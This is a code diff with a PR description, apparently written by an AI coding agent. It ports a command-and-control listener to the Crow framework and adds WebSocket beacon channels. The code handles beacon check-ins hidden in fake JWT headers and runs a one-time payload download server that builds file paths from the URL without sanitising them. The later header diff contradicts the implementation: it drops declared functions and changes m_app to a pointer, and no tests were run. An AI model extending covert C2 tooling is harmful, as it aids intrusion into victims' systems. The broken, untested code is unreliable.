@@ -151,109 +212,137 @@ void ListenerHttp::launchHttpServ()
                         m_logger->debug("File download endpoint: {}", uriFileDownload);
                 if(!downloadFolder.empty())
                         m_logger->debug("Download folder: {}", downloadFolder);
-                for (const auto& value : uri)
-                {
-                        if(value.is_string())
-                                m_logger->debug("Registered URI: {}", value.get<std::string>());
-                }
+                for (const auto& value : guardConfig->uris)
+                        m_logger->debug("Registered URI: {}", value);
+                for (const auto& value : wsUris)
+                        m_logger->debug("Registered WS URI: {}", value);
         }
 #endif
 
-    // Filter to match the URI of the config file or the file download URI
-        m_svr->set_post_routing_handler([&, uriFileDownload](const auto& req, auto& res)
+        setupHttpRoutes(guardConfig->uris, uriFileDownload, downloadFolder);
+        setupWebSocketRoutes(wsUris);
+
+        m_app.websocket_max_payload(m_wsMaxMessageSize);
+
+        if (wsUris.empty())
+                m_wsPingInterval = std::chrono::seconds(0);
+
+        startWebSocketMaintenance();
+
+        try
         {
-                bool isUri = false;
-                for (const auto& value : uri)
+                auto& app = m_app.port(static_cast<uint16_t>(m_port)).bindaddr(m_host).concurrency(1);
+
+#ifdef CROW_ENABLE_SSL
+                if (m_isHttps)
                 {
-                        if(value.is_string() && req.path == value.get<std::string>())
+                        std::string servCrtFile = m_listenerConfig.value("ServHttpsListenerCrtFile", std::string{});
+                        std::string servKeyFile = m_listenerConfig.value("ServHttpsListenerKeyFile", std::string{});
+                        if(servCrtFile.empty() || servKeyFile.empty())
                         {
-                                isUri=true;
-                                break;
+#ifdef BUILD_TEAMSERVER
+                                if(m_logger)
+                                        m_logger->error("Missing HTTPS certificate configuration for listener on {}:{}", m_host, m_port);
+#endif
+                                return;
                         }
-                }
-
-                if (!uriFileDownload.empty() && req.path.find(uriFileDownload) != std::string::npos)
-                        isUri=true;
-
-                if ( isUri )
-                {
-                        return Server::HandlerResponse::Unhandled;
+                        app.ssl_file(servCrtFile, servKeyFile);
                 }
                 else
                 {
+                        // nothing to configure
+                }
+#else
+                if (m_isHttps)
+                {
 #ifdef BUILD_TEAMSERVER
                         if(m_logger)
-                                m_logger->warn("Unauthorized connection {}", req.path);
+                                m_logger->error("HTTPS requested but CROW_ENABLE_SSL is not defined");
 #endif
-                        res.status = 401;
-                        return Server::HandlerResponse::Handled;
+                        return;
                 }
-        });
+#endif
 
-        // Post handle
-        for (const auto& endpoint : uri)
+                app.run();
+        }
+        catch (const std::exception& ex)
         {
-                if(!endpoint.is_string())
-                        continue;
-                const std::string endpointStr = endpoint.get<std::string>();
-                m_svr->Post(endpointStr, [&](const auto& req, auto& res)
+#ifdef BUILD_TEAMSERVER
+                if(m_logger)
+                        m_logger->error("Exception while running {} listener: {}", m_isHttps ? "HTTPS" : "HTTP", ex.what());
+#endif
+        }
+        catch (...)
+        {
+#ifdef BUILD_TEAMSERVER
+                if(m_logger)
+                        m_logger->error("Unknown exception while running {} listener", m_isHttps ? "HTTPS" : "HTTP");
+#endif
+        }
+}
+
+
+void ListenerHttp::setupHttpRoutes(const std::vector<std::string>& uri, const std::string& uriFileDownload, const std::string& downloadFolder)
+{
+        // Post handle
+        for (const auto& endpointStr : uri)
+        {
+                m_app.route_dynamic(endpointStr).methods(crow::HTTPMethod::Post)([this](const crow::request& req, crow::response& res)
                 {
                         try
                         {
 #ifdef BUILD_TEAMSERVER
                                 if(m_logger && m_logger->should_log(spdlog::level::debug))
-                                        m_logger->debug("Post connection: {}", req.path);
+                                        m_logger->debug("Post connection: {}", req.url);
 #endif
                                 this->HandleCheckIn(req, res);
-                                res.status = 200;
+                                res.code = 200;
+                                res.end();
                         }
                         catch(const std::exception& ex)
                         {
 #ifdef BUILD_TEAMSERVER
                                 if(m_logger)
-                                        m_logger->warn("Exception while handling POST {}: {}", req.path, ex.what());
+                                        m_logger->warn("Exception while handling POST {}: {}", req.url, ex.what());
 #endif
-                                res.status = 401;
+                                res.code = 401;
+                                res.end();
                         }
                         catch (...)
                         {
 #ifdef BUILD_TEAMSERVER
                                 if(m_logger)
-                                        m_logger->warn("Unknown failure occurred while handling POST {}", req.path);
+                                        m_logger->warn("Unknown failure occurred while handling POST {}", req.url);
 #endif
-                                res.status = 401;
+                                res.code = 401;
+                                res.end();
                         }
                 });
         }
 
         // Get handle
-        for (const auto& endpoint : uri)
+        for (const auto& endpointStr : uri)
         {
-                if(!endpoint.is_string())
-                        continue;
-                const std::string endpointStr = endpoint.get<std::string>();
-                m_svr->Get(endpointStr, [&](const auto& req, auto& res)
+                m_app.route_dynamic(endpointStr).methods(crow::HTTPMethod::Get)([this](const crow::request& req, crow::response& res)
                 {
                         try
                         {
-#ifdef BUILD_TEAMSERVER
-                                // m_logger->info("Get connection: {0}", req.path);
-#endif
-                if (req.has_header("Authorization")) 
-                {
-                    // jwt should contained Bearer b64data.b6data.beaconData
-                    std::string jwt = req.get_header_value("Authorization");
+                                auto authIt = req.headers.find("Authorization");
+                                if (authIt != req.headers.end())
+                                {
+                                        std::string jwt = authIt->second;
 
-                    std::string data;
-                    char delimiter = '.';
-                    size_t pos = jwt.find_last_of(delimiter);
-                    if (pos != std::string::npos) 
-                        data = jwt.substr(pos + 1);
+                                        std::string data;
+                                        char delimiter = '.';
+                                        size_t pos = jwt.find_last_of(delimiter);
+                                        if (pos != std::string::npos)
+                                                data = jwt.substr(pos + 1);
 
                                         if(!data.empty())
                                         {
                                                 this->HandleCheckIn(data, res);
-                                                res.status = 200;
+                                                res.code = 200;
+                                                res.end();
                                         }
                                         else
                                         {
@@ -261,7 +350,8 @@ void ListenerHttp::launchHttpServ()
                                                 if(m_logger)
                                                         m_logger->warn("Get: invalid JWT provided");
 #endif
-                                                res.status = 401;
+                                                res.code = 401;
+                                                res.end();
                                         }
                                 }
                                 else
@@ -270,60 +360,67 @@ void ListenerHttp::launchHttpServ()
                                         if(m_logger)
                                                 m_logger->warn("Get: no Authorization header");
 #endif
-                                        res.status = 401;
+                                        res.code = 401;
+                                        res.end();
                                 }
                         }
                         catch(const std::exception& ex)
                         {
 #ifdef BUILD_TEAMSERVER
                                 if(m_logger)
-                                        m_logger->warn("Exception while handling GET {}: {}", req.path, ex.what());
+                                        m_logger->warn("Exception while handling GET {}: {}", req.url, ex.what());
 #endif
-                                res.status = 401;
+                                res.code = 401;
+                                res.end();
                         }
                         catch (...)
                         {
 #ifdef BUILD_TEAMSERVER
                                 if(m_logger)
-                                        m_logger->warn("Unknown failure occurred while handling GET {}", req.path);
+                                        m_logger->warn("Unknown failure occurred while handling GET {}", req.url);
 #endif
-                                res.status = 401;
+                                res.code = 401;
+                                res.end();
                         }
                 });
         }
 
-    // File Server
-    if(!uriFileDownload.empty())
-    {
-        std::string fileDownloadReg = uriFileDownload;
-        fileDownloadReg+=":filename";
-        m_svr->Get(fileDownloadReg, [&](const Request& req, Response& res) 
+        // File Server
+        if(!uriFileDownload.empty())
         {
-            bool deleteFile=false;
-            auto it = req.headers.find("OneTimeDownload");
-            if (it != req.headers.end()) 
-            {
-                std::string header_value = it->second;
-                deleteFile=true;
-            } 
+                std::string fileDownloadReg = uriFileDownload + "<string>";
+                m_app.route_dynamic(fileDownloadReg).methods(crow::HTTPMethod::Get)([this, downloadFolder](const crow::request& req, crow::response& res)
+                {
+                        bool deleteFile=false;
+                        if (req.headers.find("OneTimeDownload") != req.headers.end())
+                                deleteFile=true;
 
 #ifdef BUILD_TEAMSERVER
                         if(m_logger && m_logger->should_log(spdlog::level::debug))
-                                m_logger->debug("File server connection: {}, OneTimeDownload {}", req.path, deleteFile);
+                                m_logger->debug("File server connection: {}, OneTimeDownload {}", req.url, deleteFile);
 #endif
 
-            std::string filename = req.path_params.at("filename");
-            std::string filePath = downloadFolder;
-            filePath+="/";
-            filePath+=filename;
-            std::ifstream file(filePath, std::ios::binary);
+                        std::string filename;
+                        if (!req.url_params.empty())
+                                filename = req.url_params.get("1");
+                        if (filename.empty() && req.url.size() > 0)
+                        {
+                                // fallback: extract trailing segment
+                                auto pos = req.url.find_last_of('/');
+                                if (pos != std::string::npos && pos + 1 < req.url.size())
+                                        filename = req.url.substr(pos + 1);
+                        }
 
-            if (file) 
-            {
-                                
+                        std::string filePath = downloadFolder;
+                        if(!filePath.empty() && filePath.back() != '/')
+                                filePath += "/";
+                        filePath+=filename;
+                        std::ifstream file(filePath, std::ios::binary);
 
-                std::string buffer;
-                buffer.assign(std::istreambuf_iterator<char>(file), std::istreambuf_iterator<char>());
+                        if (file)
+                        {
+                                std::string buffer;
+                                buffer.assign(std::istreambuf_iterator<char>(file), std::istreambuf_iterator<char>());
 
 #ifdef BUILD_TEAMSERVER
                                 std::string md5 = computeBufferMd5(buffer);
@@ -335,36 +432,118 @@ void ListenerHttp::launchHttpServ()
                                 );
 #endif
 
-                res.set_content(buffer, "application/x-binary");
+                                res.add_header("Content-Type", "application/x-binary");
+                                res.body = buffer;
 
-                file.close();
-                if(deleteFile)
-                {
+                                file.close();
+                                if(deleteFile)
+                                {
 #ifdef BUILD_TEAMSERVER
                                         if(m_logger)
                                                 m_logger->info("Delete file {}", filePath);
 #endif
-                    // std::string backUpFile = filePath+".DELETED";
-                    // std::rename(filePath.data(), backUpFile.data());
-                    std::remove(filePath.data());
-                }
-            } 
-            else 
-            {
+                                        std::remove(filePath.data());
+                                }
+                        }
+                        else
+                        {
 #ifdef BUILD_TEAMSERVER
                                 if(m_logger)
                                         m_logger->warn("File server: File not found at {}", filePath);
 #endif
-                res.status = 404;
-            }
-        });
-    }
+                                res.code = 404;
+                        }
 
-    m_svr->listen(m_host.c_str(), m_port);
+                        res.end();
+                });
+        }
 }
 
 
-int ListenerHttp::HandleCheckIn(const httplib::Request& req, httplib::Response& res)
+void ListenerHttp::setupWebSocketRoutes(const std::vector<std::string>& wsUris)
+{
+        for (const auto& endpoint : wsUris)
+        {
+                m_app.websocket(endpoint)
+                        .max_payload(m_wsMaxMessageSize)
+                        .onopen([this, endpoint](crow::websocket::connection& conn)
+                        {
+                                registerWebSocket(conn, endpoint);
+                        })
+                        .onclose([this](crow::websocket::connection& conn, const std::string& reason, uint16_t code)
+                        {
+                                unregisterWebSocket(conn, reason, code);
+                        })
+                        .onmessage([this](crow::websocket::connection& conn, const std::string& data, bool isBinary)
+                        {
+                                forwardWebSocketPayload(conn, data, isBinary);
+                        });
+        }
+}
+
+
+void ListenerHttp::startWebSocketMaintenance()
+{
+        if (m_wsIdleTimeout.count() == 0 && m_wsPingInterval.count() == 0)
+                return;
+
+        if (m_wsMaintenanceThread)
+                return;
+
+        m_wsMaintenanceThread = std::make_unique<std::thread>([this]()
+        {
+                while (!m_stopRequested)
+                {
+                        auto waitDuration = m_wsPingInterval.count() > 0 ? m_wsPingInterval : std::chrono::seconds(1);
+                        std::this_thread::sleep_for(waitDuration);
+
+                        const auto now = std::chrono::steady_clock::now();
+                        std::vector<std::shared_ptr<WebSocketSession>> sessionsCopy;
+
+                        {
+                                std::lock_guard<std::mutex> lock(m_wsMutex);
+                                for (auto& kv : m_wsSessions)
+                                {
+                                        if (kv.second)
+                                                sessionsCopy.push_back(kv.second);
+                                }
+                        }
+
+                        for (auto& session : sessionsCopy)
+                        {
+                                if (!session->open.load())
+                                        continue;
+
+                                if (m_wsIdleTimeout.count() > 0)
+                                {
+                                        auto idle = std::chrono::duration_cast<std::chrono::seconds>(now - session->lastActivity);
+                                        if (idle >= m_wsIdleTimeout)
+                                        {
+                                                session->connection->close("idle timeout");
+                                                session->open = false;
+                                                continue;
+                                        }
+                                }
+
+                                if (m_wsPingInterval.count() > 0)
+                                {
+                                        session->connection->send_ping("");
+                                }
+                        }
+                }
+        });
+}
+
+
+void ListenerHttp::stopWebSocketMaintenance()
+{
+        if (m_wsMaintenanceThread && m_wsMaintenanceThread->joinable())
+                m_wsMaintenanceThread->join();
+        m_wsMaintenanceThread.reset();
+}
+
+
+int ListenerHttp::HandleCheckIn(const crow::request& req, crow::response& res)
 {
     string input = req.body;
 
@@ -376,11 +555,10 @@ int ListenerHttp::HandleCheckIn(const httplib::Request& req, httplib::Response& 
         }
 #endif
 
-    string output;
-    bool ret = handleMessages(input, output);
+        string output;
+        bool ret = handleMessages(input, output);
 
-
-    json httpHeaders;
+        json httpHeaders;
         try
         {
                 httpHeaders = m_listenerConfig.at("server").at("headers");
@@ -394,26 +572,22 @@ int ListenerHttp::HandleCheckIn(const httplib::Request& req, httplib::Response& 
                 return -1;
         }
 
-    httplib::Headers httpServerHeaders;
-    for (auto& it : httpHeaders.items())
-        httpServerHeaders.insert({(it).key(), (it).value()});
-    res.headers = httpServerHeaders;
+        for (auto& it : httpHeaders.items())
+                res.add_header((it).key(), (it).value());
 
 #ifdef BUILD_TEAMSERVER
         if(m_logger)
                 m_logger->trace("output.size {}", std::to_string(output.size()));
 #endif
 
-    if(ret)
-        res.body = output;
-    else
-        res.status = 200;
+        if(ret)
+                res.body = output;
 
     return 0;
 }
 
 
-int ListenerHttp::HandleCheckIn(const std::string& requestData, httplib::Response& res)
+int ListenerHttp::HandleCheckIn(const std::string& requestData, crow::response& res)
 {
 #ifdef BUILD_TEAMSERVER
         if(m_logger)
@@ -423,11 +597,10 @@ int ListenerHttp::HandleCheckIn(const std::string& requestData, httplib::Respons
         }
 #endif
 
-    string output;
-    bool ret = handleMessages(requestData, output);
+        string output;
+        bool ret = handleMessages(requestData, output);
 
-
-    json httpHeaders;
+        json httpHeaders;
         try
         {
                 httpHeaders = m_listenerConfig.at("server").at("headers");
@@ -441,20 +614,89 @@ int ListenerHttp::HandleCheckIn(const std::string& requestData, httplib::Respons
                 return -1;
         }
 
-    httplib::Headers httpServerHeaders;
-    for (auto& it : httpHeaders.items())
-        httpServerHeaders.insert({(it).key(), (it).value()});
-    res.headers = httpServerHeaders;
+        for (auto& it : httpHeaders.items())
+                res.add_header((it).key(), (it).value());
 
 #ifdef BUILD_TEAMSERVER
         if(m_logger)
                 m_logger->trace("output.size {}", std::to_string(output.size()));
 #endif
 
-    if(ret)
-        res.body = output;
-    else
-        res.status = 200;
+        if(ret)
+                res.body = output;
 
     return 0;
+}
+
+
+void ListenerHttp::registerWebSocket(crow::websocket::connection& conn, const std::string& endpoint)
+{
+        auto session = std::make_shared<WebSocketSession>();
+        session->connection = &conn;
+        session->id = random_string(8);
+        session->remoteIp = conn.get_remote_ip();
+        session->lastActivity = std::chrono::steady_clock::now();
+        session->lastBinary = false;
+
+        {
+                std::lock_guard<std::mutex> lock(m_wsMutex);
+                m_wsSessions[&conn] = session;
+        }
+
+#ifdef BUILD_TEAMSERVER
+        if(m_logger)
+                m_logger->info("WebSocket connection opened on {} from {} (id={})", endpoint, session->remoteIp, session->id);
+#endif
+}
+
+
+void ListenerHttp::unregisterWebSocket(crow::websocket::connection& conn, const std::string& reason, uint16_t code)
+{
+        std::shared_ptr<WebSocketSession> session;
+        {
+                std::lock_guard<std::mutex> lock(m_wsMutex);
+                auto it = m_wsSessions.find(&conn);
+                if (it != m_wsSessions.end())
+                {
+                        session = it->second;
+                        m_wsSessions.erase(it);
+                }
+        }
+
+        if (session)
+                session->open = false;
+
+#ifdef BUILD_TEAMSERVER
+        if(m_logger)
+                m_logger->info("WebSocket connection closed (id={}, code={}, reason={})", session ? session->id : "", code, reason);
+#endif
+}
+
+
+void ListenerHttp::forwardWebSocketPayload(crow::websocket::connection& conn, const std::string& payload, bool isBinary)
+{
+        std::shared_ptr<WebSocketSession> session;
+        {
+                std::lock_guard<std::mutex> lock(m_wsMutex);
+                auto it = m_wsSessions.find(&conn);
+                if (it != m_wsSessions.end())
+                        session = it->second;
+        }
+
+        if (!session)
+                return;
+
+        session->lastActivity = std::chrono::steady_clock::now();
+        session->lastBinary = isBinary;
+
+        std::string output;
+        bool ret = handleMessages(payload, output);
+
+        if (ret)
+        {
+                if (isBinary)
+                        conn.send_binary(output);
+                else
+                        conn.send_text(output);
+        }
 }

--- a/listener/ListenerHttp.hpp
+++ b/listener/ListenerHttp.hpp
@@ -2,8 +2,15 @@
 
 #include "Listener.hpp"
 
-#define CPPHTTPLIB_OPENSSL_SUPPORT
-#include "httplib.h"
+#include <atomic>
+#include <chrono>
+#include <mutex>
+#include <string>
+#include <thread>
+#include <unordered_map>
+#include <vector>
+
+#include <crow.h>
 
 
 class ListenerHttp : public Listener
@@ -16,16 +23,72 @@ public:
     int init();
 
 private:
-    void launchHttpServ();
+    struct PathGuardConfig
+    {
+        std::vector<std::string> uris;
+        std::vector<std::string> wsUris;
+        std::string downloadPrefix;
+    };
 
-    int HandleCheckIn(const httplib::Request& req, httplib::Response& res);
-    int HandleCheckIn(const std::string& requestData, httplib::Response& res);
+    struct PathGuardMiddleware
+    {
+        struct context
+        {
+        };
+
+        void before_handle(crow::request& req, crow::response& res, context&);
+        void after_handle(crow::request&, crow::response&, context&) {}
+
+        void setConfig(std::shared_ptr<const PathGuardConfig> config)
+        {
+            m_config = std::move(config);
+        }
+
+    private:
+        std::shared_ptr<const PathGuardConfig> m_config;
+    };
+
+    struct WebSocketSession
+    {
+        crow::websocket::connection* connection{nullptr};
+        std::string id;
+        std::string remoteIp;
+        std::atomic<bool> open{true};
+        std::chrono::steady_clock::time_point lastActivity{std::chrono::steady_clock::now()};
+        bool lastBinary{false};
+    };
+
+    using CrowApp = crow::App<PathGuardMiddleware>;
+
+private:
+    void launchHttpServ();
+    void setupHttpRoutes(const std::vector<std::string>& uri, const std::string& uriFileDownload, const std::string& downloadFolder);
+    void setupWebSocketRoutes(const std::vector<std::string>& wsUris);
+    void startWebSocketMaintenance();
+    void stopWebSocketMaintenance();
+
+    int HandleCheckIn(const crow::request& req, crow::response& res);
+    int HandleCheckIn(const std::string& requestData, crow::response& res);
+    bool processPayload(const std::string& input, std::string& output);
+
+    void registerWebSocket(crow::websocket::connection& conn, const std::string& endpoint);
+    void unregisterWebSocket(crow::websocket::connection& conn, const std::string& reason, uint16_t code);
+    void forwardWebSocketPayload(crow::websocket::connection& conn, const std::string& payload, bool isBinary);
 
     std::string m_host;
     int m_port;
         bool m_isHttps;
         nlohmann::json m_listenerConfig;
 
-    std::unique_ptr<httplib::Server> m_svr;
+    CrowApp m_app;
     std::unique_ptr<std::thread> m_httpServ;
+
+    std::atomic<bool> m_stopRequested{false};
+
+    std::unordered_map<crow::websocket::connection*, std::shared_ptr<WebSocketSession>> m_wsSessions;
+    std::mutex m_wsMutex;
+    std::unique_ptr<std::thread> m_wsMaintenanceThread;
+    std::chrono::seconds m_wsIdleTimeout{std::chrono::seconds{0}};
+    std::chrono::seconds m_wsPingInterval{std::chrono::seconds{15}};
+    uint64_t m_wsMaxMessageSize{1024 * 1024};
 };

--- a/listener/ListenerHttp.hpp
+++ b/listener/ListenerHttp.hpp
@@ -58,37 +58,29 @@ private:
         bool lastBinary{false};
     };
 
-    using CrowApp = crow::App<PathGuardMiddleware>;
-
 private:
     void launchHttpServ();
-    void setupHttpRoutes(const std::vector<std::string>& uri, const std::string& uriFileDownload, const std::string& downloadFolder);
-    void setupWebSocketRoutes(const std::vector<std::string>& wsUris);
-    void startWebSocketMaintenance();
-    void stopWebSocketMaintenance();
 
     int HandleCheckIn(const crow::request& req, crow::response& res);
     int HandleCheckIn(const std::string& requestData, crow::response& res);
     bool processPayload(const std::string& input, std::string& output);
 
-    void registerWebSocket(crow::websocket::connection& conn, const std::string& endpoint);
+    void registerWebSocket(crow::websocket::connection& conn, const std::string& endpoint="");
     void unregisterWebSocket(crow::websocket::connection& conn, const std::string& reason, uint16_t code);
     void forwardWebSocketPayload(crow::websocket::connection& conn, const std::string& payload, bool isBinary);
 
     std::string m_host;
     int m_port;
-        bool m_isHttps;
-        nlohmann::json m_listenerConfig;
+    bool m_isHttps;
+    nlohmann::json m_listenerConfig;
 
-    CrowApp m_app;
+    std::vector<std::string> m_uris;
+    std::vector<std::string> m_wsUris;
+
+    crow::App<PathGuardMiddleware> * m_app;
     std::unique_ptr<std::thread> m_httpServ;
-
-    std::atomic<bool> m_stopRequested{false};
 
     std::unordered_map<crow::websocket::connection*, std::shared_ptr<WebSocketSession>> m_wsSessions;
     std::mutex m_wsMutex;
-    std::unique_ptr<std::thread> m_wsMaintenanceThread;
-    std::chrono::seconds m_wsIdleTimeout{std::chrono::seconds{0}};
-    std::chrono::seconds m_wsPingInterval{std::chrono::seconds{15}};
     uint64_t m_wsMaxMessageSize{1024 * 1024};
 };


### PR DESCRIPTION
## Summary
- replace the HTTP listener implementation with Crow, preserving existing routes, headers, and TLS behavior
- add WebSocket endpoint support with session tracking, idle timeout/ping maintenance, and reuse of existing message processing
- expose configuration for WebSocket endpoints and limits while keeping original HTTP download and check-in semantics intact

## Testing
- Not run (not requested)

------
[Codex Task](https://chatgpt.com/codex/tasks/task_e_695c120ac4248325b72e3dcd6333f744)